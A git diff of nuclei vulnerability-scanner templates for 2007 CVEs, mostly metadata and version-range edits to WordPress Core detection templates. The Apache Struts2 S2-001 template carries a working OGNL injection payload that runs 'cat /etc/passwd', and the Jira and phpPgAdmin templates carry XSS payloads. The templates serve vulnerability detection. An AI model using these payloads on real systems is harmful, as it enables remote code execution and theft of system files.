b/nuclei-templates/CVE-2007/CVE-2007-0262.yaml @@ -1,14 +1,14 @@ id: CVE-2007-0262 info: - name: "WordPress Core < 2.0.7 - Full Path Disclosure" + name: > + WordPress Core < 2.0.7 - Full Path Disclosure author: topscoder severity: medium - description: "WordPress 2.0.6, and 2.1Alpha 3 (SVN:4662), does not properly verify that the m parameter value has the string data type, which allows remote attackers to obtain sensitive information via an invalid m[] parameter, as demonstrated by obtaining the path, and obtaining certain SQL information such as the table prefix." + description: > + WordPress 2.0.6, and 2.1Alpha 3 (SVN:4662), does not properly verify that the m parameter value has the string data type, which allows remote attackers to obtain sensitive information via an invalid m[] parameter, as demonstrated by obtaining the path, and obtaining certain SQL information such as the table prefix. reference: - - http://osvdb.org/33458 - - http://www.securityfocus.com/archive/1/456731/100/0/threaded - - https://wordpress.org/news/2007/01/wordpress-207/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b1446daf-662d-479c-8fc5-80b27b04d6c4?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 diff --git a/nuclei-templates/CVE-2007/CVE-2007-0539.yaml b/nuclei-templates/CVE-2007/CVE-2007-0539.yaml index d2d6dfda79..9c695df7d7 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-0539.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-0539.yaml @@ -1,15 +1,14 @@ id: CVE-2007-0539 info: - name: "WordPress Core < 2.1 - Denial of Service" + name: > + WordPress Core < 2.1 - Denial of Service author: topscoder severity: medium - description: "The wp_remote_fopen function in WordPress before 2.1 allows remote attackers to cause a denial of service (bandwidth or thread consumption) via pingback service calls with a source URI that corresponds to a large file, which triggers a long download session without a timeout constraint." + description: > + The wp_remote_fopen function in WordPress before 2.1 allows remote attackers to cause a denial of service (bandwidth or thread consumption) via pingback service calls with a source URI that corresponds to a large file, which triggers a long download session without a timeout constraint. reference: - - http://www.securityfocus.com/archive/1/458003/100/0/threaded - - http://www.securityfocus.com/archive/1/457996/100/0/threaded - - http://securityreason.com/securityalert/2191 - - https://wordpress.org/news/2007/01/ella-21/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/94332eb8-0961-4c8d-97bb-3d5d08e8119f?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L cvss-score: 4.3 @@ -33,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '< 2.1') - - compare_versions(version_by_js, '< 2.1') - - compare_versions(version_by_css, '< 2.1') + - compare_versions(version_by_generator, '<= 2.1') + - compare_versions(version_by_js, '<= 2.1') + - compare_versions(version_by_css, '<= 2.1') - type: status status: diff --git a/nuclei-templates/CVE-2007/CVE-2007-0541.yaml b/nuclei-templates/CVE-2007/CVE-2007-0541.yaml index 52223d4703..92c7ff9f54 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-0541.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-0541.yaml @@ -1,15 +1,14 @@ id: CVE-2007-0541 info: - name: "WordPress Core < 2.1 - Directory Traversal" + name: > + WordPress Core < 2.1 - Directory Traversal author: topscoder severity: medium - description: "WordPress allows remote attackers to determine the existence of arbitrary files, and possibly read portions of certain files, via pingback service calls with a source URI that corresponds to a local pathname, which triggers different fault codes for existing and non-existing files, and in certain configurations causes a brief file excerpt to be published as a blog comment." + description: > + WordPress allows remote attackers to determine the existence of arbitrary files, and possibly read portions of certain files, via pingback service calls with a source URI that corresponds to a local pathname, which triggers different fault codes for existing and non-existing files, and in certain configurations causes a brief file excerpt to be published as a blog comment. reference: - - http://www.securityfocus.com/archive/1/458003/100/0/threaded - - http://www.securityfocus.com/archive/1/457996/100/0/threaded - - http://securityreason.com/securityalert/2191 - - https://wordpress.org/news/2007/01/ella-21/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c84e274e-292f-4d0f-b847-4a786b4cb15a?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 @@ -33,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '< 2.1') - - compare_versions(version_by_js, '< 2.1') - - compare_versions(version_by_css, '< 2.1') + - compare_versions(version_by_generator, '<= 2.1') + - compare_versions(version_by_js, '<= 2.1') + - compare_versions(version_by_css, '<= 2.1') - type: status status: diff --git a/nuclei-templates/CVE-2007/CVE-2007-0885.yaml b/nuclei-templates/CVE-2007/CVE-2007-0885.yaml deleted file mode 100644 index 275c87fe70..0000000000 --- a/nuclei-templates/CVE-2007/CVE-2007-0885.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2007-0885 - -info: - name: Rainbow.Zen Jira XSS - author: geeknik - severity: medium - description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter. - reference: - - http://web.archive.org/web/20201208220614/https://www.securityfocus.com/archive/1/459590/100/0/threaded - - https://web.archive.org/web/20210119080228/http://www.securityfocus.com/bid/22503 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/32418 - classification: - cve-id: CVE-2007-0885 - tags: cve,cve2007,jira,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e' - - matchers-condition: and - matchers: - - type: word - words: - - '">' - - - type: status - status: - - 200 - - - type: word - part: header - words: - - "text/html" diff --git a/nuclei-templates/CVE-2007/CVE-2007-1049.yaml b/nuclei-templates/CVE-2007/CVE-2007-1049.yaml index fbe2ffe3b6..c3d2e4cd3f 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-1049.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-1049.yaml @@ -1,22 +1,14 @@ id: CVE-2007-1049 info: - name: "WordPress Core < 2.09 - Cross-Site Scripting" + name: > + WordPress Core < 2.09 - Cross-Site Scripting author: topscoder severity: high - description: "Cross-site scripting (XSS) vulnerability in the wp_explain_nonce function in the nonce AYS functionality (wp-includes/functions.php) for WordPress 2.0 before 2.0.9 and 2.1 before 2.1.1 allows remote attackers to inject arbitrary web script or HTML via the file parameter to wp-admin/templates.php, and possibly other vectors involving the action variable." + description: > + Cross-site scripting (XSS) vulnerability in the wp_explain_nonce function in the nonce AYS functionality (wp-includes/functions.php) for WordPress 2.0 before 2.0.9 and 2.1 before 2.1.1 allows remote attackers to inject arbitrary web script or HTML via the file parameter to wp-admin/templates.php, and possibly other vectors involving the action variable. reference: - - http://trac.wordpress.org/changeset/4876 - - http://secunia.com/advisories/24306 - - http://trac.wordpress.org/changeset/4877 - - http://www.vupen.com/english/advisories/2007/0741 - - http://osvdb.org/33766 - - http://www.securityfocus.com/bid/22534 - - http://downloads.securityfocus.com/vulnerabilities/exploits/22534.html - - http://secunia.com/advisories/24566 - - http://www.gentoo.org/security/en/glsa/glsa-200703-23.xml - - http://trac.wordpress.org/ticket/3781 - - https://wordpress.org/news/2007/02/new-releases/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b16d675f-1b62-4e3e-b91b-7bdb1e70a221?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 @@ -40,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '>= 2.1', '<= 2.1') - - compare_versions(version_by_js, '>= 2.1', '<= 2.1') - - compare_versions(version_by_css, '>= 2.1', '<= 2.1') + - compare_versions(version_by_generator, '2.1') + - compare_versions(version_by_js, '2.1') + - compare_versions(version_by_css, '2.1') - type: status status: diff --git a/nuclei-templates/CVE-2007/CVE-2007-1230.yaml b/nuclei-templates/CVE-2007/CVE-2007-1230.yaml index 12521e3aa8..cee26a1c16 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-1230.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-1230.yaml @@ -1,18 +1,14 @@ id: CVE-2007-1230 info: - name: "WordPress Core <= 2.1.1 - Cross-Site Scripting" + name: > + WordPress Core <= 2.1.1 - Cross-Site Scripting author: topscoder severity: medium - description: "Multiple cross-site scripting (XSS) vulnerabilities in wp-includes/functions.php in WordPress before 2.1.2-alpha allow remote attackers to inject arbitrary web script or HTML via (1) the Referer HTTP header or (2) the URI, a different vulnerability than CVE-2007-1049." + description: > + Multiple cross-site scripting (XSS) vulnerabilities in wp-includes/functions.php in WordPress before 2.1.2-alpha allow remote attackers to inject arbitrary web script or HTML via (1) the Referer HTTP header or (2) the URI, a different vulnerability than CVE-2007-1049. reference: - - http://trac.wordpress.org/changeset/4952 - - http://www.vupen.com/english/advisories/2007/0756 - - http://secunia.com/advisories/24566 - - http://trac.wordpress.org/changeset/4951 - - http://www.gentoo.org/security/en/glsa/glsa-200703-23.xml - - http://osvdb.org/34361 - - https://wordpress.org/news/2007/03/upgrade-212/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a9162c2e-e765-4bda-b09f-982603b5797a?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N cvss-score: 6.4 diff --git a/nuclei-templates/CVE-2007/CVE-2007-1244.yaml b/nuclei-templates/CVE-2007/CVE-2007-1244.yaml index 6ba238545f..976ec76102 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-1244.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-1244.yaml @@ -1,20 +1,14 @@ id: CVE-2007-1244 info: - name: "WordPress Core <= 2.1.1 - Cross-Site Scripting" + name: > + WordPress Core <= 2.1.1 - Cross-Site Scripting author: topscoder severity: medium - description: "Cross-site request forgery (CSRF) vulnerability in the AdminPanel in WordPress 2.1.1 and earlier allows remote attackers to perform privileged actions as administrators, as demonstrated using the delete action in wp-admin/post.php. NOTE: this issue can be leveraged to perform cross-site scripting (XSS) attacks and steal cookies via the post parameter." + description: > + Cross-site request forgery (CSRF) vulnerability in the AdminPanel in WordPress 2.1.1 and earlier allows remote attackers to perform privileged actions as administrators, as demonstrated using the delete action in wp-admin/post.php. NOTE: this issue can be leveraged to perform cross-site scripting (XSS) attacks and steal cookies via the post parameter. reference: - - https://exchange.xforce.ibmcloud.com/vulnerabilities/32703 - - http://archives.neohapsis.com/archives/fulldisclosure/2007-02/0583.html - - http://www.securityfocus.com/archive/1/461351/100/0/threaded - - http://www.securityfocus.com/bid/22735 - - http://secunia.com/advisories/24566 - - http://osvdb.org/33787 - - http://www.gentoo.org/security/en/glsa/glsa-200703-23.xml - - http://osvdb.org/33788 - - https://wordpress.org/news/2007/03/upgrade-212/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c6670e56-ae81-4b1b-8274-bf355a411e92?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N cvss-score: 6.4 diff --git a/nuclei-templates/CVE-2007/CVE-2007-1277.yaml b/nuclei-templates/CVE-2007/CVE-2007-1277.yaml index 0afef2c7b5..0e26e4477d 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-1277.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-1277.yaml @@ -1,21 +1,14 @@ id: CVE-2007-1277 info: - name: "WordPress Core 2.2.1 - Backdoor" + name: > + WordPress Core 2.2.1 - Backdoor author: topscoder severity: critical - description: "WordPress 2.1.1, as downloaded from some official distribution sites during February and March 2007, contains an externally introduced backdoor that allows remote attackers to execute arbitrary commands via (1) an eval injection vulnerability in the ix parameter to wp-includes/feed.php, and (2) an untrusted passthru call in the iz parameter to wp-includes/theme.php." + description: > + WordPress 2.1.1, as downloaded from some official distribution sites during February and March 2007, contains an externally introduced backdoor that allows remote attackers to execute arbitrary commands via (1) an eval injection vulnerability in the ix parameter to wp-includes/feed.php, and (2) an untrusted passthru call in the iz parameter to wp-includes/theme.php. reference: - - http://www.securityfocus.com/archive/1/461794/100/0/threaded - - http://www.kb.cert.org/vuls/id/214480 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/32807 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/32804 - - http://www.securityfocus.com/bid/22797 - - http://www.vupen.com/english/advisories/2007/0812 - - http://wordpress.org/development/2007/03/upgrade-212/ - - http://www.kb.cert.org/vuls/id/641456 - - http://ifsec.blogspot.com/2007/03/wordpress-code-compromised-to-enable.html - - http://secunia.com/advisories/24374 + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e5539ad8-4203-4d22-9a40-0ed6e0471e19?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -39,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '>= 2.2.1', '<= 2.2.1') - - compare_versions(version_by_js, '>= 2.2.1', '<= 2.2.1') - - compare_versions(version_by_css, '>= 2.2.1', '<= 2.2.1') + - compare_versions(version_by_generator, '2.2.1') + - compare_versions(version_by_js, '2.2.1') + - compare_versions(version_by_css, '2.2.1') - type: status status: diff --git a/nuclei-templates/CVE-2007/CVE-2007-1599.yaml b/nuclei-templates/CVE-2007/CVE-2007-1599.yaml index ac43c540f7..7c59f48a17 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-1599.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-1599.yaml @@ -1,16 +1,14 @@ id: CVE-2007-1599 info: - name: "WordPress Core < 2.0.10 - Open Redirect" + name: > + WordPress Core < 2.0.10 - Open Redirect author: topscoder severity: medium - description: "wp-login.php in WordPress allows remote attackers to redirect authenticated users to other websites and potentially obtain sensitive information via the redirect_to parameter." + description: > + wp-login.php in WordPress allows remote attackers to redirect authenticated users to other websites and potentially obtain sensitive information via the redirect_to parameter. reference: - - http://www.metaeye.org/advisories/40 - - http://secunia.com/advisories/30960 - - http://www.securityfocus.com/archive/1/463291/100/0/threaded - - http://www.debian.org/security/2008/dsa-1601 - - https://wordpress.org/news/2007/04/wordpress-213-and-2010/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9f7469ec-cbd5-4f13-8455-b907f2542836?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -34,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '< 2.0.10') - - compare_versions(version_by_js, '< 2.0.10') - - compare_versions(version_by_css, '< 2.0.10') + - compare_versions(version_by_generator, '<= 2.0.10') + - compare_versions(version_by_js, '<= 2.0.10') + - compare_versions(version_by_css, '<= 2.0.10') - type: status status: diff --git a/nuclei-templates/CVE-2007/CVE-2007-1622.yaml b/nuclei-templates/CVE-2007/CVE-2007-1622.yaml index 9632628df2..787a769493 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-1622.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-1622.yaml @@ -1,19 +1,14 @@ id: CVE-2007-1622 info: - name: "WordPress Core <= 2.1.2 - Cross-Site Scripting" + name: > + WordPress Core <= 2.1.2 - Cross-Site Scripting author: topscoder severity: medium - description: "Cross-site scripting (XSS) vulnerability in wp-admin/vars.php in WordPress before 2.0.10 RC2, and before 2.1.3 RC2 in the 2.1 series, allows remote authenticated users with theme privileges to inject arbitrary web script or HTML via the PATH_INFO in the administration interface, related to loose regular expression processing of PHP_SELF." + description: > + Cross-site scripting (XSS) vulnerability in wp-admin/vars.php in WordPress before 2.0.10 RC2, and before 2.1.3 RC2 in the 2.1 series, allows remote authenticated users with theme privileges to inject arbitrary web script or HTML via the PATH_INFO in the administration interface, related to loose regular expression processing of PHP_SELF. reference: - - http://www.vupen.com/english/advisories/2007/1005 - - http://www.buayacorp.com/files/wordpress/wordpress-advisory.txt - - http://www.securityfocus.com/bid/23027 - - http://secunia.com/advisories/25108 - - http://secunia.com/advisories/24567 - - http://www.debian.org/security/2007/dsa-1285 - - http://sla.ckers.org/forum/read.php?2,7935#msg-8006 - - https://wordpress.org/news/2007/04/wordpress-213-and-2010/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a6074c97-619d-4f47-97c7-781c7a38019d?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -37,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '<= 2.0.9') - - compare_versions(version_by_js, '<= 2.0.9') - - compare_versions(version_by_css, '<= 2.0.9') + - compare_versions(version_by_generator, '>= 2.1', '<= 2.1.2') + - compare_versions(version_by_js, '>= 2.1', '<= 2.1.2') + - compare_versions(version_by_css, '>= 2.1', '<= 2.1.2') - type: status status: diff --git a/nuclei-templates/CVE-2007/CVE-2007-1893.yaml b/nuclei-templates/CVE-2007/CVE-2007-1893.yaml index 4ec85416e9..8ff05c1770 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-1893.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-1893.yaml @@ -1,19 +1,14 @@ id: CVE-2007-1893 info: - name: "WordPress Core < 2.1.3 - Authorization Bypass" + name: > + WordPress Core < 2.1.3 - Authorization Bypass author: topscoder severity: medium - description: "xmlrpc (xmlrpc.php) in WordPress 2.1.2, and probably earlier, allows remote authenticated users with the contributor role to bypass intended access restrictions and invoke the publish_posts functionality, which can be used to 'publish a previously saved post.'" + description: > + xmlrpc (xmlrpc.php) in WordPress 2.1.2, and probably earlier, allows remote authenticated users with the contributor role to bypass intended access restrictions and invoke the publish_posts functionality, which can be used to "publish a previously saved post." reference: - - http://www.vupen.com/english/advisories/2007/1245 - - http://secunia.com/advisories/25108 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/33470 - - http://trac.wordpress.org/ticket/4091 - - http://www.notsosecure.com/folder2/2007/04/03/wordpress-212-xmlrpc-security-issues/ - - http://secunia.com/advisories/24751 - - http://www.debian.org/security/2007/dsa-1285 - - https://wordpress.org/news/2007/04/wordpress-213-and-2010/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/292be50c-6eab-4462-b46c-c7763e8aa223?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N cvss-score: 4.3 diff --git a/nuclei-templates/CVE-2007/CVE-2007-1894.yaml b/nuclei-templates/CVE-2007/CVE-2007-1894.yaml index 19a507b594..6a87ee37a6 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-1894.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-1894.yaml @@ -1,21 +1,14 @@ id: CVE-2007-1894 info: - name: "WordPress Core <= 2.1.2 - Cross-Site Scripting" + name: > + WordPress Core <= 2.1.2 - Cross-Site Scripting author: topscoder severity: medium - description: "Cross-site scripting (XSS) vulnerability in wp-includes/general-template.php in WordPress before 20070309 allows remote attackers to inject arbitrary web script or HTML via the year parameter in the wp_title function." + description: > + Cross-site scripting (XSS) vulnerability in wp-includes/general-template.php in WordPress before 20070309 allows remote attackers to inject arbitrary web script or HTML via the year parameter in the wp_title function. reference: - - http://secunia.com/advisories/24485 - - http://www.securityfocus.com/bid/22902 - - http://trac.wordpress.org/changeset/5003 - - http://secunia.com/advisories/25108 - - http://www.securityfocus.com/archive/1/462374/100/0/threaded - - http://trac.wordpress.org/ticket/4093 - - http://securityreason.com/securityalert/2526 - - http://www.debian.org/security/2007/dsa-1285 - - http://chxsecurity.org/advisories/adv-1-mid.txt - - https://wordpress.org/news/2007/04/wordpress-213-and-2010/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c7d04f7d-d114-4104-a7cb-298c148e2b6d?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N cvss-score: 6.4 @@ -39,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '<= 2.0.9') - - compare_versions(version_by_js, '<= 2.0.9') - - compare_versions(version_by_css, '<= 2.0.9') + - compare_versions(version_by_generator, '>= 2.1', '<= 2.1.2') + - compare_versions(version_by_js, '>= 2.1', '<= 2.1.2') + - compare_versions(version_by_css, '>= 2.1', '<= 2.1.2') - type: status status: diff --git a/nuclei-templates/CVE-2007/CVE-2007-1897.yaml b/nuclei-templates/CVE-2007/CVE-2007-1897.yaml index 98bc59ef42..7bddd83880 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-1897.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-1897.yaml @@ -1,20 +1,14 @@ id: CVE-2007-1897 info: - name: "WordPress Core < 2.1.3 - SQL Injection" + name: > + WordPress Core < 2.1.3 - SQL Injection author: topscoder severity: high - description: "SQL injection vulnerability in xmlrpc (xmlrpc.php) in WordPress 2.1.2, and probably earlier, allows remote authenticated users to execute arbitrary SQL commands via a string parameter value in an XML RPC mt.setPostCategories method call, related to the post_id variable." + description: > + SQL injection vulnerability in xmlrpc (xmlrpc.php) in WordPress 2.1.2, and probably earlier, allows remote authenticated users to execute arbitrary SQL commands via a string parameter value in an XML RPC mt.setPostCategories method call, related to the post_id variable. reference: - - https://www.exploit-db.com/exploits/3656 - - http://www.vupen.com/english/advisories/2007/1245 - - http://secunia.com/advisories/25108 - - http://trac.wordpress.org/ticket/4091 - - http://www.notsosecure.com/folder2/2007/04/03/wordpress-212-xmlrpc-security-issues/ - - http://secunia.com/advisories/24751 - - http://www.securityfocus.com/bid/23294 - - http://www.debian.org/security/2007/dsa-1285 - - https://wordpress.org/news/2007/04/wordpress-213-and-2010/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/65c72e79-f0a9-4293-98be-956d8e4afb83?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 @@ -38,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '< 2.1.3') - - compare_versions(version_by_js, '< 2.1.3') - - compare_versions(version_by_css, '< 2.1.3') + - compare_versions(version_by_generator, '<= 2.1.3') + - compare_versions(version_by_js, '<= 2.1.3') + - compare_versions(version_by_css, '<= 2.1.3') - type: status status: diff --git a/nuclei-templates/CVE-2007/CVE-2007-4556.yaml b/nuclei-templates/CVE-2007/CVE-2007-4556.yaml deleted file mode 100644 index 26b2abdb28..0000000000 --- a/nuclei-templates/CVE-2007/CVE-2007-4556.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2007-4556 -info: - name: OpenSymphony XWork/Apache Struts2 - Remote Code Execution - author: pikpikcu - severity: critical - description: | - Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character. - reference: - - https://www.guildhab.top/?p=2326 - - https://nvd.nist.gov/vuln/detail/CVE-2007-4556 - - https://cwiki.apache.org/confluence/display/WW/S2-001 - - http://forums.opensymphony.com/ann.jspa?annID=54 - classification: - cve-id: CVE-2007-4556 - tags: cve,cve2007,apache,rce,struts -requests: - - method: POST - path: - - "{{BaseURL}}/login.action" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/10 diff --git a/nuclei-templates/CVE-2007/CVE-2007-5728.yaml b/nuclei-templates/CVE-2007/CVE-2007-5728.yaml deleted file mode 100644 index e3e78104af..0000000000 --- a/nuclei-templates/CVE-2007/CVE-2007-5728.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2007-5728 - -info: - name: phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting - author: dhiyaneshDK - severity: medium - description: Cross-site scripting (XSS) vulnerability in phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, different vectors than CVE-2007-2865. - reference: - - https://www.exploit-db.com/exploits/30090 - - http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html - - http://web.archive.org/web/20210130131735/https://www.securityfocus.com/bid/24182/ - - http://web.archive.org/web/20161220160642/http://secunia.com/advisories/25446/ - classification: - cve-id: CVE-2007-5728 - metadata: - shodan-query: http.title:"phpPgAdmin" - tags: cve,cve2007,xss,pgadmin,phppgadmin - -requests: - - method: GET - path: - - '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test' - - matchers-condition: and - matchers: - - - type: word - words: - - '' - - - type: status - status: - - 200 - - - type: word - part: header - words: - - "text/html" diff --git a/nuclei-templates/CVE-2007/cve-2007-0885.yaml b/nuclei-templates/CVE-2007/cve-2007-0885.yaml new file mode 100644 index 0000000000..b237557509 --- /dev/null +++ b/nuclei-templates/CVE-2007/cve-2007-0885.yaml @@ -0,0 +1,29 @@ +id: CVE-2007-0885 + +info: + name: Rainbow.Zen Jira XSS + description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter. + reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded + author: geeknik + severity: medium + tags: cve,cve2007,jira,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e' + + matchers-condition: and + matchers: + - type: word + words: + - '">' + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" diff --git a/nuclei-templates/CVE-2007/cve-2007-4556.yaml b/nuclei-templates/CVE-2007/cve-2007-4556.yaml new file mode 100644 index 0000000000..1a7b1450ed --- /dev/null +++ b/nuclei-templates/CVE-2007/cve-2007-4556.yaml @@ -0,0 +1,30 @@ +id: CVE-2007-4556 + +info: + name: Apache Struts2 S2-001 RCE + author: pikpikcu + severity: critical + description: Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character. + reference: https://www.guildhab.top/?p=2326 + tags: cve,cve2007,apache,rce,struts + +requests: + - method: POST + path: + - "{{BaseURL}}/login.action" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2007/cve-2007-5728.yaml b/nuclei-templates/CVE-2007/cve-2007-5728.yaml new file mode 100644 index 0000000000..9d71758d46 --- /dev/null +++ b/nuclei-templates/CVE-2007/cve-2007-5728.yaml @@ -0,0 +1,32 @@ +id: CVE-2007-5728 + +info: + name: phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting + author: dhiyaneshDK + severity: medium + description: Cross-site scripting (XSS) vulnerability in phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, different vectors than CVE-2007-2865. + tags: cve,cve2007,xss,pgadmin,phppgadmin + reference: https://www.exploit-db.com/exploits/30090 + metadata: + shodan-query: 'http.title:"phpPgAdmin"' + +requests: + - method: GET + path: + - '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test' + + matchers-condition: and + matchers: + + - type: word + words: + - '' + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" diff --git a/nuclei-templates/CVE-2008/CVE-2008-1059.yaml b/nuclei-templates/CVE-2008/CVE-2008-1059.yaml index a61fe66200..4d096ce1ea 100644 --- a/nuclei-templates/CVE-2008/CVE-2008-1059.yaml +++ b/nuclei-templates/CVE-2008/CVE-2008-1059.yaml @@ -6,19 +6,31 @@ info: 